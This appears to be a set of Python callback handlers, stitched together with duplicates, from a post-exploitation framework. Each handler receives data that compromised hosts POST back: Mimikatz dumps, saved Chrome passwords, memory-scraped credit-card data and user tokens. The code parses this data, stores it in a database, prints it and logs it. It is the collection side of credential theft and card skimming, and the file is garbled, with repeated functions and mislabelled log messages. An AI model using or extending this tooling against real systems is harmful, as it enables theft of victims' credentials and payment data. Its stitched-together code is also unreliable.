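def on_response(self, context, response):
    """Handle the POST-back of Mimikatz output from a tracked host.

    Acknowledges the request with an empty 200, reads the body, runs it
    through ``self.parse_mimikatz``, stores every credential set in the
    context database and writes the raw output to a log file.

    Args:
        context: module context exposing ``log`` and ``db``.
        response: request handler for the inbound POST.
    """
    response.send_response(200)
    response.end_headers()

    # Content-Length is supplied by the remote host.  A missing or
    # malformed header used to crash the handler (int(None)); treat it
    # as an empty body.  The clamp to >= 0 avoids read(-1), which would
    # block until the peer closes the connection.
    try:
        length = max(int(response.headers.getheader('content-length') or 0), 0)
    except ValueError:
        length = 0
    data = response.rfile.read(length)

    # We've received the response, stop tracking this host
    response.stop_tracking_host()

    if not data:
        return

    creds = self.parse_mimikatz(data)
    if creds:
        context.log.success(
            "Found credentials in Mimikatz output (domain\\username:password)"
        )
        for cred_set in creds:
            # parse_mimikatz yields 6-tuples; the trailing two fields are
            # not used by this module.
            credtype, domain, username, password, _, _ = cred_set
            context.db.add_credential(credtype, domain, username, password)
            context.log.highlight('{}\\{}:{}'.format(domain, username, password))

    # Keep the raw output on disk, keyed by source address and timestamp.
    log_name = 'Mimikatz-{}-{}.log'.format(
        response.client_address[0],
        datetime.now().strftime("%Y-%m-%d_%H%M%S"))
    write_log(data, log_name)
    context.log.info("Saved Mimikatz's output to {}".format(log_name))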
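    def on_response(self, context, response):
        """Handle the POST-back of Mimikatz output from a tracked host.

        Acknowledges the request with an empty 200, reads the body, runs it
        through ``self.parse_mimikatz``, stores every credential set in the
        context database (linked to the host record of the sending address)
        and writes the raw output to a log file.

        Args:
            context: module context exposing ``log`` and ``db``.
            response: request handler for the inbound POST.
        """
        response.send_response(200)
        response.end_headers()

        # Content-Length is supplied by the remote host.  A missing or
        # malformed header used to crash the handler (int(None)); treat it
        # as an empty body.  The clamp to >= 0 avoids read(-1), which would
        # block until the peer closes the connection.
        try:
            length = max(int(response.headers.getheader('content-length') or 0), 0)
        except ValueError:
            length = 0
        data = response.rfile.read(length)

        # We've received the response, stop tracking this host
        response.stop_tracking_host()

        if not data:
            return

        client_ip = response.client_address[0]
        creds = self.parse_mimikatz(data)
        if creds:
            context.log.success("Found credentials in Mimikatz output (domain\\username:password)")

            # The host lookup does not depend on the credential, so do it
            # once rather than per credential set.  An unknown host used to
            # raise IndexError on the empty result; report it instead.
            hosts = context.db.get_hosts(client_ip)
            hostid = hosts[0][0] if hosts else None
            if hostid is None:
                context.log.error("No host record for {}, credentials will not be stored".format(client_ip))

            for cred_set in creds:
                # parse_mimikatz yields 6-tuples; the trailing two fields are
                # not used by this module.
                credtype, domain, username, password, _, _ = cred_set
                if hostid is not None:
                    context.db.add_credential(credtype, domain, username, password, hostid)
                context.log.highlight('{}\\{}:{}'.format(domain, username, password))

        # Keep the raw output on disk, keyed by source address and timestamp.
        log_name = 'Mimikatz-{}-{}.log'.format(client_ip, datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved Mimikatz's output to {}".format(log_name))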
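    def on_response(self, context, response):
        """Handle the POST-back of saved-Chrome-credential output.

        Acknowledges the request with an empty 200, reads the body, scans it
        for ``URL`` / user / password records, prints any found and writes
        the raw output to a log file.

        Args:
            context: module context exposing ``log``.
            response: request handler for the inbound POST.
        """
        response.send_response(200)
        response.end_headers()

        # Content-Length is supplied by the remote host.  A missing or
        # malformed header used to crash the handler (int(None)); treat it
        # as an empty body.  The clamp to >= 0 avoids read(-1), which would
        # block until the peer closes the connection.
        try:
            length = max(int(response.headers.getheader('content-length') or 0), 0)
        except ValueError:
            length = 0
        data = response.rfile.read(length)

        # We've received the response, stop tracking this host
        response.stop_tracking_host()

        if not data:
            return

        lines = StringIO(data).readlines()
        creds = []

        # Expected record layout: the URL line, the user line directly below
        # it and the password line three below, each as "key: value".  The
        # body is remote input, so a truncated record or a line without a
        # colon must be skipped rather than raise IndexError.
        for i, line in enumerate(lines):
            if 'URL' not in line:
                continue
            if i + 3 >= len(lines):
                break
            fields = [
                lines[i].split(':', 1),
                lines[i + 1].split(':', 1),
                lines[i + 3].split(':', 1),
            ]
            if any(len(field) < 2 for field in fields):
                continue
            url, user, passw = (field[1].strip() for field in fields)
            creds.append({'url': url, 'user': user, 'passw': passw})

        if creds:
            context.log.success('Found saved Chrome credentials:')
            for cred in creds:
                context.log.highlight('URL: ' + cred['url'])
                context.log.highlight('Username: '******'user'])
                context.log.highlight('Password: '******'passw'])
                context.log.highlight('')

        # Keep the raw output on disk, keyed by source address and timestamp.
        log_name = 'EnumChrome-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved Mimikatz's output to {}".format(log_name))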
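    def on_response(self, context, response):
        """Handle the POST-back of memory-scraper output.

        Acknowledges the request with an empty 200, reads the body and
        base64-decodes it.  A decodable body is reported as possible credit
        card data, printed line by line and written to a log file; a body
        that is not valid base64 is only printed.

        Args:
            context: module context exposing ``log``.
            response: request handler for the inbound POST.
        """
        response.send_response(200)
        response.end_headers()

        # Content-Length is supplied by the remote host.  A missing or
        # malformed header used to crash the handler (int(None)); treat it
        # as an empty body.  The clamp to >= 0 avoids read(-1), which would
        # block until the peer closes the connection.
        try:
            length = max(int(response.headers.getheader('content-length') or 0), 0)
        except ValueError:
            length = 0
        data = response.rfile.read(length)

        if not data:
            return

        def print_post_data(payload):
            # Echo every non-blank-stripped line of the body to the console.
            for line in StringIO(payload.strip()).readlines():
                context.log.highlight(line.strip())

        # b64decode reports bad input as TypeError (Python 2) or
        # binascii.Error, a ValueError subclass (Python 3).  Catching only
        # those keeps KeyboardInterrupt and genuine bugs visible, which the
        # former bare except did not.
        try:
            data = b64decode(data)
        except (TypeError, ValueError):
            print_post_data(data)
            return

        context.log.success('Found possible credit card data')
        print_post_data(data)

        # Keep the decoded output on disk, keyed by source address and timestamp.
        log_name = 'MemScraper-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved output to {}".format(log_name))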
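    def on_response(self, context, response):
        """Handle the POST-back of saved-Chrome-credential output.

        Acknowledges the request with an empty 200, reads the body, scans it
        for ``URL`` / user / password records, prints any found and writes
        the raw output to a log file.  A parsing failure is reported and
        the raw log is still written so it can be inspected by hand.

        Args:
            context: module context exposing ``log``.
            response: request handler for the inbound POST.
        """
        response.send_response(200)
        response.end_headers()

        # Content-Length is supplied by the remote host.  A missing or
        # malformed header used to crash the handler (int(None)); treat it
        # as an empty body.  The clamp to >= 0 avoids read(-1), which would
        # block until the peer closes the connection.
        try:
            length = max(int(response.headers.getheader('content-length') or 0), 0)
        except ValueError:
            length = 0
        data = response.rfile.read(length)

        # We've received the response, stop tracking this host
        response.stop_tracking_host()

        if not data:
            return

        lines = StringIO(data).readlines()
        creds = []

        try:
            # Expected record layout: the URL line, the user line directly
            # below it and the password line three below, each as
            # "key: value".  Truncated records and lines without a colon
            # are skipped explicitly instead of relying on the except below.
            for i, line in enumerate(lines):
                if 'URL' not in line:
                    continue
                if i + 3 >= len(lines):
                    break
                fields = [
                    lines[i].split(':', 1),
                    lines[i + 1].split(':', 1),
                    lines[i + 3].split(':', 1),
                ]
                if any(len(field) < 2 for field in fields):
                    continue
                url, user, passw = (field[1].strip() for field in fields)
                creds.append({
                    'url': url,
                    'user': user,
                    'passw': passw
                })

            if creds:
                context.log.success('Found saved Chrome credentials:')
                for cred in creds:
                    context.log.highlight('URL: ' + cred['url'])
                    context.log.highlight('Username: '******'user'])
                    context.log.highlight('Password: '******'passw'])
                    context.log.highlight('')
        # Best-effort parse of remote output: anything unexpected is reported
        # rather than raised, but a bare except would also swallow
        # KeyboardInterrupt/SystemExit, so narrow it to Exception.
        except Exception:
            context.log.error(
                'Error parsing Mimikatz output, please check log file manually for possible credentials'
            )

        # Keep the raw output on disk, keyed by source address and timestamp.
        log_name = 'EnumChrome-{}-{}.log'.format(
            response.client_address[0],
            datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved Mimikatz's output to {}".format(log_name))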
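    def on_response(self, context, response):
        """Handle the POST-back of a token enumeration.

        Acknowledges the request with an empty 200, reads the body, and then
        either looks for ``self.user`` in it, looks for any user listed in
        ``self.userfile`` (first match wins), or prints the whole body when
        neither is configured.  The raw output is always written to a log.

        Args:
            context: module context exposing ``log``.
            response: request handler for the inbound POST.
        """
        response.send_response(200)
        response.end_headers()

        # Content-Length is supplied by the remote host.  A missing or
        # malformed header used to crash the handler (int(None)); treat it
        # as an empty body.  The clamp to >= 0 avoids read(-1), which would
        # block until the peer closes the connection.
        try:
            length = max(int(response.headers.getheader('content-length') or 0), 0)
        except ValueError:
            length = 0
        data = response.rfile.read(length)

        # We've received the response, stop tracking this host
        response.stop_tracking_host()

        if not data:
            return

        def print_post_data(payload):
            # Echo every line of the body to the console.
            for line in StringIO(payload.strip()).readlines():
                context.log.highlight(line.strip())

        context.log.success('Enumerated available tokens')

        if self.user:
            if self.user in data:
                context.log.success("Found token for user {}!".format(self.user))
                print_post_data(data)

        elif self.userfile:
            with open(self.userfile, 'r') as userfile:
                for user in userfile:
                    user = user.strip()
                    # A blank line would match every body (''.find() is 0)
                    # and report a bogus "token for user !" hit.
                    if not user:
                        continue
                    if user in data:
                        context.log.success("Found token for user {}!".format(user))
                        print_post_data(data)
                        break

        else:
            print_post_data(data)

        # Keep the raw output on disk, keyed by source address and timestamp.
        log_name = 'Tokens-{}-{}.log'.format(
            response.client_address[0],
            datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved output to {}".format(log_name))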
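    def on_response(self, context, response):
        """Handle the POST-back of PowerView output.

        Acknowledges the request with an empty 200, reads the body, prints
        it line by line and writes the raw output to a log file.

        Args:
            context: module context exposing ``log``.
            response: request handler for the inbound POST.
        """
        response.send_response(200)
        response.end_headers()

        # Content-Length is supplied by the remote host.  A missing or
        # malformed header used to crash the handler (int(None)); treat it
        # as an empty body.  The clamp to >= 0 avoids read(-1), which would
        # block until the peer closes the connection.
        try:
            length = max(int(response.headers.getheader('content-length') or 0), 0)
        except ValueError:
            length = 0
        data = response.rfile.read(length)

        # We've received the response, stop tracking this host
        response.stop_tracking_host()

        if not data:
            return

        # Echo every line of the body to the console.
        for line in StringIO(data.strip()).readlines():
            context.log.highlight(line.strip())

        # Keep the raw output on disk, keyed by source address and timestamp.
        log_name = 'PowerView-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved output to {}".format(log_name))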
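    def on_response(self, context, response):
        """Handle the POST-back of MimiKittenz output.

        Acknowledges the request with an empty 200, reads the body, prints
        it line by line and writes the raw output to a log file.

        Args:
            context: module context exposing ``log``.
            response: request handler for the inbound POST.
        """
        response.send_response(200)
        response.end_headers()

        # Content-Length is supplied by the remote host.  A missing or
        # malformed header used to crash the handler (int(None)); treat it
        # as an empty body.  The clamp to >= 0 avoids read(-1), which would
        # block until the peer closes the connection.
        try:
            length = max(int(response.headers.getheader('content-length') or 0), 0)
        except ValueError:
            length = 0
        data = response.rfile.read(length)

        # We've received the response, stop tracking this host
        response.stop_tracking_host()

        if not data:
            return

        # Echo every line of the body to the console.
        for line in StringIO(data.strip()).readlines():
            context.log.highlight(line.strip())

        # Keep the raw output on disk, keyed by source address and timestamp.
        log_name = 'MimiKittenz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved output to {}".format(log_name))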
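    def on_response(self, context, response):
        """Handle the POST-back of a token enumeration.

        Acknowledges the request with an empty 200, reads the body, and then
        either looks for ``self.user`` in it, looks for any user listed in
        ``self.userfile`` (first match wins), or prints the whole body when
        neither is configured.  The raw output is always written to a log.

        Args:
            context: module context exposing ``log``.
            response: request handler for the inbound POST.
        """
        response.send_response(200)
        response.end_headers()

        # Content-Length is supplied by the remote host.  A missing or
        # malformed header used to crash the handler (int(None)); treat it
        # as an empty body.  The clamp to >= 0 avoids read(-1), which would
        # block until the peer closes the connection.
        try:
            length = max(int(response.headers.getheader('content-length') or 0), 0)
        except ValueError:
            length = 0
        data = response.rfile.read(length)

        # We've received the response, stop tracking this host
        response.stop_tracking_host()

        if not data:
            return

        def print_post_data(payload):
            # Echo every line of the body to the console.
            for line in StringIO(payload.strip()).readlines():
                context.log.highlight(line.strip())

        context.log.success('Enumerated available tokens')

        if self.user:
            if self.user in data:
                context.log.success("Found token for user {}!".format(self.user))
                print_post_data(data)

        elif self.userfile:
            with open(self.userfile, 'r') as userfile:
                for user in userfile:
                    user = user.strip()
                    # A blank line would match every body (''.find() is 0)
                    # and report a bogus "token for user !" hit.
                    if not user:
                        continue
                    if user in data:
                        context.log.success("Found token for user {}!".format(user))
                        print_post_data(data)
                        break

        else:
            print_post_data(data)

        # Keep the raw output on disk, keyed by source address and timestamp.
        log_name = 'Tokens-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
        write_log(data, log_name)
        context.log.info("Saved output to {}".format(log_name))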